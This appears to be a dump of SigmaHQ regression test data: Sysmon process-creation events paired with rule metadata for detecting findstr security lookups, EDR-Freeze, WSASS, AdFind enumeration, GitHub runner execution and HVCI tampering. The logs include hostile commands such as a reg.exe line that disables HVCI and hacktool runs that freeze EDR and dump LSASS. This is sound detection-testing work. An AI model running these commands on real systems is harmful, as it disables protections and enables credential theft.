Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "FINDSTR.EXE", "CommandLine": "findstr virus", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": 
"SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F", "ParentProcessGuid": "5AA13A44-D612-68FC-1931-000000004002", "ParentProcessId": 5144, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "cmd /c \"tasklist | findstr virus\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/info.yml ================================================ id: 4497a849-5942-4e5f-9de7-9c82c41e4ad9 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 4fe074b4-b833-4081-8f24-7dcfeca72b42 title: Security Tools Keyword Lookup Via Findstr.EXE regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_finger_execution/af491bca-e752-4b44-9c86-df5680533dbc.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T17:47:36.346438Z" } }, "EventRecordID": 12260122, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { 
"#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 17:47:36.344", "ProcessGuid": "5AA13A44-0D38-68FD-B736-000000004002", "ProcessId": 7732, "Image": "C:\\Windows\\System32\\finger.exe", "FileVersion": "10.0.20348.3451 (WinBuild.160101.0800)", "Description": "TCPIP Finger Command", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "finger.exe", "CommandLine": "finger", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=9DFF43AAF3833E42520A4E426F9132ECFC8A1138,MD5=F05FE1D85C1E9B37E27A78DE2A099977,SHA256=9C08862150B290F3834D02F9C2924C3E163B403AC4B00853BCB78B40E00DE6B5,IMPHASH=4EC5391C083809964BB61804E493A505", "ParentProcessGuid": "5AA13A44-0BDF-68FD-7936-000000004002", "ParentProcessId": 5232, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "cmd / c \"tasklist | findstr lsass\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_finger_execution/info.yml ================================================ id: 312cf7da-b126-4d53-afc7-01c96aa9710e description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: af491bca-e752-4b44-9c86-df5680533dbc title: Finger.EXE Execution regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_finger_execution/af491bca-e752-4b44-9c86-df5680533dbc.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_github_self_hosted_runner/5bac7a56-da88-4c27-922e-c81e113b20cb.json 
================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-12-02T13:40:15.065147Z" } }, "EventRecordID": 129581, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3712, "ThreadID": 5804 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "SUPPORTHUB", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-12-02 13:40:15.062", "ProcessGuid": "39845534-EC3F-692E-AC01-000000007A00", "ProcessId": 2252, "Image": "C:\\Users\\Lab\\Downloads\\actions-runner\\bin\\Runner.Listener.exe", "FileVersion": "2.329.0.0", "Description": "Runner.Listener", "Product": "Runner.Listener", "Company": "Runner.Listener", "OriginalFileName": "Runner.Listener.dll", "CommandLine": "\"C:\\Users\\Lab\\Downloads\\actions-runner\\bin\\Runner.Listener.exe\" configure --url https://github.com/Koifman/shaihulud --token ACJKO5TZBN2V54V7WQEQMMLJF34ZQ", "CurrentDirectory": "C:\\Users\\Lab\\Downloads\\actions-runner\\", "User": "SUPPORTHUB\\Lab", "LogonGuid": "39845534-EA70-692E-18E8-080000000000", "LogonId": "0x8e818", "TerminalSessionId": 1, "IntegrityLevel": "Medium", "Hashes": "MD5=F2D98E1A81C92345E9FB4C3A8BA80DA9,SHA256=0C90A42A6BE0078726279708539FF3275A40031BCCC6D31FCF77D0A03B6F6BBB,IMPHASH=6A91EB82BFD19D2706C7D43C46F7064E", "ParentProcessGuid": "39845534-EC3E-692E-AA01-000000007A00", "ParentProcessId": 9300, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\Lab\\Downloads\\actions-runner\\config.cmd\" --url https://github.com/Koifman/shaihulud --token 
ACJKO5TZBN2V54V7WQEQMMLJF34ZQ\"", "ParentUser": "SUPPORTHUB\\Lab" } } } { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-12-02T13:40:43.642304Z" } }, "EventRecordID": 129609, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3712, "ThreadID": 5804 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "SUPPORTHUB", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-12-02 13:40:43.639", "ProcessGuid": "39845534-EC5B-692E-B601-000000007A00", "ProcessId": 6588, "Image": "C:\\Users\\Lab\\Downloads\\actions-runner\\bin\\Runner.Worker.exe", "FileVersion": "2.329.0.0", "Description": "Runner.Worker", "Product": "Runner.Worker", "Company": "Runner.Worker", "OriginalFileName": "Runner.Worker.dll", "CommandLine": "\"C:\\Users\\Lab\\Downloads\\actions-runner\\bin\\Runner.Worker.exe\" spawnclient 2076 2088", "CurrentDirectory": "C:\\Users\\Lab\\Downloads\\actions-runner\\bin\\", "User": "SUPPORTHUB\\Lab", "LogonGuid": "39845534-EA70-692E-18E8-080000000000", "LogonId": "0x8e818", "TerminalSessionId": 1, "IntegrityLevel": "Medium", "Hashes": "MD5=B8B5BE3A38732DE389D648044B798146,SHA256=08A676AE543078E5C6163B94E17F9C38D3193A1D59E8BA94ADE43FA0BCA8312C,IMPHASH=6A91EB82BFD19D2706C7D43C46F7064E", "ParentProcessGuid": "39845534-EC43-692E-AF01-000000007A00", "ParentProcessId": 7392, "ParentImage": "C:\\Users\\Lab\\Downloads\\actions-runner\\bin\\Runner.Listener.exe", "ParentCommandLine": "\"C:\\Users\\Lab\\Downloads\\actions-runner\\\\bin\\Runner.Listener.exe\" run", "ParentUser": "SUPPORTHUB\\Lab" } } } ================================================ FILE: 
regression_data/rules/windows/process_creation/proc_creation_win_github_self_hosted_runner/info.yml ================================================ id: 94e5ba8c-3bdf-4e12-9300-f7684530d301 description: Includes two process events that will match against the linked SIGMA rule for both conditions date: 2025-12-02 author: Daniel Koifman (KoifSec) rule_metadata: - id: 5bac7a56-da88-4c27-922e-c81e113b20cb title: Github Self-Hosted Runner Execution regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon path: regression_data/rules/windows/process_creation/proc_creation_win_github_self_hosted_runner/5bac7a56-da88-4c27-922e-c81e113b20cb.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_gpresult_execution/e56d3073-83ff-4021-90fe-c658e0709e72.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-27T00:09:41.570583Z" } }, "EventRecordID": 33638020, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3380, "ThreadID": 4420 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-27 00:09:41.563", "ProcessGuid": "5AA13A44-B845-68FE-3702-000000004102", "ProcessId": 9004, "Image": "C:\\Windows\\System32\\gpresult.exe", "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", "Description": "Query Group Policy RSOP Data", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", 
"OriginalFileName": "gprslt.exe", "CommandLine": "gpresult /z", "CurrentDirectory": "C:\\Program Files\\DTrace\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-B54F-68FE-E547-0C0000000000", "LogonId": "0xc47e5", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=84DBEACB152615177EB5EE2AC4735B75186BC28F,MD5=80B679C92D709FF93DF2400966A5C183,SHA256=09F58BF0E2D334AAA7410AB613E71F4D1FD346ABEF010423020BD6C3A6C20195,IMPHASH=C853AD8534AC03E7AD69F32A5B0B1625", "ParentProcessGuid": "5AA13A44-B6AD-68FE-FC01-000000004102", "ParentProcessId": 10508, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_gpresult_execution/info.yml ================================================ id: f0e9da0c-c305-4bcb-89e5-79621d0ba6d2 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: e56d3073-83ff-4021-90fe-c658e0709e72 title: Gpresult Display Group Policy Information regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon path: regression_data/rules/windows/process_creation/proc_creation_win_gpresult_execution/e56d3073-83ff-4021-90fe-c658e0709e72.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-27T00:11:22.294854Z" } 
}, "EventRecordID": 33639600, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3380, "ThreadID": 4420 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-27 00:11:22.292", "ProcessGuid": "5AA13A44-B8AA-68FE-3F02-000000004102", "ProcessId": 7784, "Image": "C:\\Windows\\hh.exe", "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", "Description": "Microsoft® HTML Help Executable", "Product": "HTML Help", "Company": "Microsoft Corporation", "OriginalFileName": "HH.exe", "CommandLine": "\"C:\\Windows\\hh.exe\" C:\\Windows\\IME\\IMETC\\HELP\\IMTCTC14.CHM", "CurrentDirectory": "C:\\Windows\\IME\\IMETC\\HELP\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-B54F-68FE-E547-0C0000000000", "LogonId": "0xc47e5", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=641EF54FAECFA4E912DB88075FD25AABDB233A79,MD5=44A6B0A791E00D169EC0FFCFF0A17EB3,SHA256=39811F6070E82E9AA67A4D3E6153A7CD70519DBBAC36067157C573E2F736AA9E,IMPHASH=D3D9C3E81A404E7F5C5302429636F04C", "ParentProcessGuid": "5AA13A44-B55F-68FE-1A01-000000004102", "ParentProcessId": 8100, "ParentImage": "C:\\Program Files\\Everything\\Everything.exe", "ParentCommandLine": "\"C:\\Program Files\\Everything\\Everything.exe\" -startup", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_hh_chm_execution/info.yml ================================================ id: 627bc1e3-7961-4d77-96df-915627f8c3fc description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 68c8acb4-1b60-4890-8e82-3ddf7a6dba84 title: HH.EXE Execution regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon path: 
regression_data/rules/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_hktl_edr_freeze/c598cc0c-9e70-4852-b9eb-8921af79f598.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-11-27T08:12:45.123135Z" } }, "EventRecordID": 733841, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3544, "ThreadID": 4264 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-11-27 08:12:45.093", "ProcessGuid": "0197231E-07FD-6928-290C-000000000D00", "ProcessId": 9388, "Image": "C:\\Users\\xodih\\Downloads\\EDRFreeze-gnu.exe", "FileVersion": "-", "Description": "-", "Product": "-", "Company": "-", "OriginalFileName": "-", "CommandLine": "EDRFreeze-gnu.exe 3472 10000", "CurrentDirectory": "C:\\Users\\xodih\\Downloads\\", "User": "swachchhanda\\xodih", "LogonGuid": "0197231E-B736-6923-B25C-3B0000000000", "LogonId": "0x3b5cb2", "TerminalSessionId": 1, "IntegrityLevel": "High", "Hashes": "SHA1=67582B0B646E9E23846A8A9D9E412DCFABC0CCA0,MD5=A3BE334229BEBE056335780502747595,SHA256=0502C36D1F146A6B6BE31F7D7D65FEEF96A3FB3F3743DFFC38BB47AE426849F3,IMPHASH=AB8BB31EDD91D2A05FE7B62A535E9EB7", "ParentProcessGuid": "0197231E-CC5A-6927-B80A-000000000D00", "ParentProcessId": 4952, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"", "ParentUser": 
"swachchhanda\\xodih" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_hktl_edr_freeze/info.yml ================================================ id: f668b689-59c5-41a7-bc0b-22168d3df14e description: N/A date: 2025-11-27 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: c598cc0c-9e70-4852-b9eb-8921af79f598 title: Hacktool - EDR-Freeze Execution regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon path: regression_data/rules/windows/process_creation/proc_creation_win_hktl_edr_freeze/c598cc0c-9e70-4852-b9eb-8921af79f598.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_hktl_wsass/589ac73f-8e12-409c-964e-31a2f5775ae2.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-11-27T07:57:32.087108Z" } }, "EventRecordID": 676334, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3544, "ThreadID": 4264 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-11-27 07:57:32.080", "ProcessGuid": "0197231E-046C-6928-150C-000000000D00", "ProcessId": 7088, "Image": "C:\\Users\\Public\\wsass\\WSASS.exe", "FileVersion": "-", "Description": "-", "Product": "-", "Company": "-", "OriginalFileName": "-", "CommandLine": "WSASS.exe WerFaultSecure.exe 860", "CurrentDirectory": "C:\\Users\\Public\\wsass\\", "User": "swachchhanda\\xodih", 
"LogonGuid": "0197231E-B736-6923-B25C-3B0000000000", "LogonId": "0x3b5cb2", "TerminalSessionId": 1, "IntegrityLevel": "High", "Hashes": "SHA1=63AF15DCCB5CA8704918B7A8BFD0308726B2D7FD,MD5=D7A969E5A3636BF8FC9CA8A72021BFDC,SHA256=0977C9337EC1215C48A666464AFDA5C9A30CD24999A5F8E821E672991864A74C,IMPHASH=32F5095C9BBDCACF28FD4060EB4DFC42", "ParentProcessGuid": "0197231E-0250-6928-D30B-000000000D00", "ParentProcessId": 11640, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"", "ParentUser": "swachchhanda\\xodih" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_hktl_wsass/info.yml ================================================ id: e3ffac4e-8507-43f9-9542-4c9f10f49d3a description: N/A date: 2025-11-27 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: 589ac73f-8e12-409c-964e-31a2f5775ae2 title: HackTool - WSASS Execution regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon path: regression_data/rules/windows/process_creation/proc_creation_win_hktl_wsass/589ac73f-8e12-409c-964e-31a2f5775ae2.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_hvci_registry_tampering/6225c53a-a96e-4235-b28f-8d7997cd96eb.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-12-23T02:25:20.222853Z" } }, "EventRecordID": 90965, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3320, "ThreadID": 4216 } }, "Channel": 
"Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-12-23 02:25:20.191", "ProcessGuid": "0197231E-FD90-6949-5110-000000000D00", "ProcessId": 10104, "Image": "C:\\Windows\\System32\\reg.exe", "FileVersion": "10.0.26100.5074 (WinBuild.160101.0800)", "Description": "Registry Console Tool", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "reg.exe", "CommandLine": "reg.exe add \"HKLM\\System\\CurrentControlSet\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity\" /v \"Enabled\" /t REG_DWORD /d 0 /f", "CurrentDirectory": "C:\\Users\\xodih\\Downloads\\Sysmon\\", "User": "swachchhanda\\xodih", "LogonGuid": "0197231E-5032-6940-AAE2-070000000000", "LogonId": "0x7e2aa", "TerminalSessionId": 1, "IntegrityLevel": "High", "Hashes": "MD5=CE3B3DCB08556285C0FC73B7CDC1601D,SHA256=08B28258C2225574FE6359286B5D23B19F07BD39CEE04B72ED5CF7A8B7FBF9F3,IMPHASH=8E5CDA80916A6EB4EC8151EC790ED9F0", "ParentProcessGuid": "0197231E-FB8C-6949-2310-000000000D00", "ParentProcessId": 22176, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"", "ParentUser": "swachchhanda\\xodih" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_hvci_registry_tampering/info.yml ================================================ id: 7c72394d-cb39-4d53-836a-ebc524ee1685 description: N/A date: 2025-12-23 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: 6225c53a-a96e-4235-b28f-8d7997cd96eb title: Hypervisor-protected Code Integrity (HVCI) Related Registry Tampering Via CommandLine regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: 
regression_data/rules/windows/process_creation/proc_creation_win_hvci_registry_tampering/6225c53a-a96e-4235-b28f-8d7997cd96eb.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-23T09:37:40.974119Z" } }, "EventRecordID": 650014, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3076, "ThreadID": 4936 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "srv-01.midgardnet.tech", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-23 09:37:40.972", "ProcessGuid": "14207D89-F764-68F9-2410-000000003F02", "ProcessId": 4316, "Image": "C:\\Users\\SwachchhandaP\\Downloads\\AdFind\\AdFind.exe", "FileVersion": "1.62.0.6172", "Description": "-", "Product": "AdFind", "Company": "www.joeware.net", "OriginalFileName": "AdFind.exe", "CommandLine": "AdFind.exe -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties", "CurrentDirectory": "C:\\Users\\SwachchhandaP\\Downloads\\AdFind\\", "User": "MIDGARDNET\\SwachchhandaP", "LogonGuid": "14207D89-91E6-68F9-0F94-460000000000", "LogonId": "0x46940f", "TerminalSessionId": 2, "IntegrityLevel": "Medium", "Hashes": "MD5=B0C4A9C1D8C4641A161B3DBF111454DF,SHA256=484DD00E85C033FBFD506B956AC0ACD29B30F239755ED753A2788A842425B384,IMPHASH=680DAD9E300346E05A85023965867201", "ParentProcessGuid": 
"14207D89-F57C-68F9-D70F-000000003F02", "ParentProcessId": 6488, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", "ParentUser": "MIDGARDNET\\SwachchhandaP" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration/info.yml ================================================ id: de5c7702-3eb3-41be-ae33-b36a6f13d985 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 455b9d50-15a1-4b99-853f-8d37655a4c1b title: PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_execution/514e7e3e-b3b4-4a67-af60-be20f139198b.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-23T09:30:03.278177Z" } }, "EventRecordID": 649847, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3076, "ThreadID": 4936 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "srv-01.midgardnet.tech", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-23 09:30:03.253", "ProcessGuid": "14207D89-F59B-68F9-DB0F-000000003F02", "ProcessId": 6504, "Image": 
"C:\\Users\\SwachchhandaP\\Downloads\\AdFind\\AdFind.exe", "FileVersion": "1.62.0.6172", "Description": "-", "Product": "AdFind", "Company": "www.joeware.net", "OriginalFileName": "AdFind.exe", "CommandLine": "AdFind.exe -f (objectcategory=person)", "CurrentDirectory": "C:\\Users\\SwachchhandaP\\Downloads\\AdFind\\", "User": "MIDGARDNET\\SwachchhandaP", "LogonGuid": "14207D89-91E6-68F9-0F94-460000000000", "LogonId": "0x46940f", "TerminalSessionId": 2, "IntegrityLevel": "Medium", "Hashes": "MD5=B0C4A9C1D8C4641A161B3DBF111454DF,SHA256=484DD00E85C033FBFD506B956AC0ACD29B30F239755ED753A2788A842425B384,IMPHASH=680DAD9E300346E05A85023965867201", "ParentProcessGuid": "14207D89-F57C-68F9-D70F-000000003F02", "ParentProcessId": 6488, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", "ParentUser": "MIDGARDNET\\SwachchhandaP" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_execution/info.yml ================================================ id: c02bbff9-3d3b-4b4b-a6f5-8c2f4cbb60ad description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 514e7e3e-b3b4-4a67-af60-be20f139198b title: PUA - AdFind.EXE Execution regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_execution/514e7e3e-b3b4-4a67-af60-be20f139198b.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 
1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-23T11:32:08.872401Z" } }, "EventRecordID": 651803, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3076, "ThreadID": 4936 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "srv-01.midgardnet.tech", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-23 11:32:08.871", "ProcessGuid": "14207D89-1238-68FA-4A13-000000003F02", "ProcessId": 8080, "Image": "C:\\Users\\SwachchhandaP\\Downloads\\AdFind\\AdFind.exe", "FileVersion": "1.62.0.6172", "Description": "-", "Product": "AdFind", "Company": "www.joeware.net", "OriginalFileName": "AdFind.exe", "CommandLine": "AdFind.exe -s trustdmp", "CurrentDirectory": "C:\\Users\\SwachchhandaP\\Downloads\\AdFind\\", "User": "MIDGARDNET\\SwachchhandaP", "LogonGuid": "14207D89-91E6-68F9-0F94-460000000000", "LogonId": "0x46940f", "TerminalSessionId": 2, "IntegrityLevel": "Medium", "Hashes": "MD5=B0C4A9C1D8C4641A161B3DBF111454DF,SHA256=484DD00E85C033FBFD506B956AC0ACD29B30F239755ED753A2788A842425B384,IMPHASH=680DAD9E300346E05A85023965867201", "ParentProcessGuid": "14207D89-1136-68FA-2D13-000000003F02", "ParentProcessId": 1648, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": 